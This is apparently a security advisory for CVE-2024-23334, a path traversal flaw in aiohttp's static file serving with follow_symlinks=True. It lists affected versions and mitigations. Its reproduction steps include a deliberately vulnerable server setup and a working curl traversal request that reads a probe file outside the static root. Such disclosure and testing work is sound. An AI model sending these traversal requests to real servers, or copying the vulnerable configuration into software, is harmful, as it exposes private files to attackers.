# CVE-2024-23334

## Summary

aiohttp static file serving with follow_symlinks=True allows directory traversal and arbitrary file read outside the configured static root.

## Description

## Summary
Improper validation of static file paths in aiohttp’s `web.static()` handler allows directory traversal when `follow_symlinks=True`, enabling attackers to read arbitrary files outside the static root. The issue is fixed in aiohttp 3.9.2.

## Affected Package
- **Name:** aiohttp
- **Ecosystem:** pip (Python)
- **Vulnerable versions:** >= 1.0.5, < 3.9.2
- **Patched version:** 3.9.2

## Details
When aiohttp is used as a web server and a static route is configured with `follow_symlinks=True`, the implementation does not validate that the resolved path stays within the static root directory. As a result, path traversal sequences (e.g., `../`) can escape the static root and read arbitrary files on the server filesystem. The issue occurs even when no symlinks are present. This is a CWE-22 (path traversal) vulnerability.

Mitigations recommended by maintainers include disabling `follow_symlinks`, and using a reverse proxy (e.g., nginx) to serve static assets instead of aiohttp in production.

## Reproduction Steps
> **Note:** Use only in a lab environment. The steps below read a non-sensitive test file.

### Environment setup
1. Install a vulnerable version:
   ```bash
   python3 -m venv venv
   source venv/bin/activate
   pip install aiohttp==3.9.1
   ```
2. Create a minimal aiohttp server with a static route:
   ```python
   # save as server.py
   from aiohttp import web
   import os

   app = web.Application()
   os.makedirs("static", exist_ok=True)
   with open("static/index.html", "w") as f:
       f.write("ok")

   # Vulnerable configuration: follow_symlinks=True
   app.router.add_routes([
       web.static("/static", "static/", follow_symlinks=True),
   ])

   web.run_app(app, host="127.0.0.1", port=8080)
   ```
3. Create a probe file **outside** the static root:
   ```bash
   echo 'POC-AIOHTTP-VULN-TEST' > /tmp/poc-aiohttp-test.txt
   ```
4. Start the server:
   ```bash
   python3 server.py
   ```

### Trigger
5. Request the probe file using path traversal:
   ```bash
   curl -v "http://127.0.0.1:8080/static/../../../../tmp/poc-aiohttp-test.txt"
   ```

### Expected vs vulnerable behavior
- **Expected (secure):** Server should reject traversal and return 404/403.
- **Vulnerable:** Server responds with the contents of `/tmp/poc-aiohttp-test.txt`.

## Indicators of Success
- The HTTP response body contains `POC-AIOHTTP-VULN-TEST`, proving a file outside the static root was read.

## References
- https://nvd.nist.gov/vuln/detail/CVE-2024-23334
- https://github.com/advisories/GHSA-5h86-8mv2-jq9f
- https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b
- https://github.com/aio-libs/aiohttp/pull/8079
- https://www.exploit-db.com/exploits/52474
- https://github.com/TheRedP4nther/LFI-aiohttp-CVE-2024-23334-PoC
- https://github.com/brian-edgar-re/poc-cve-2024-23334

## Metadata

- Product: pip:aiohttp
- Severity: high
- Status: open
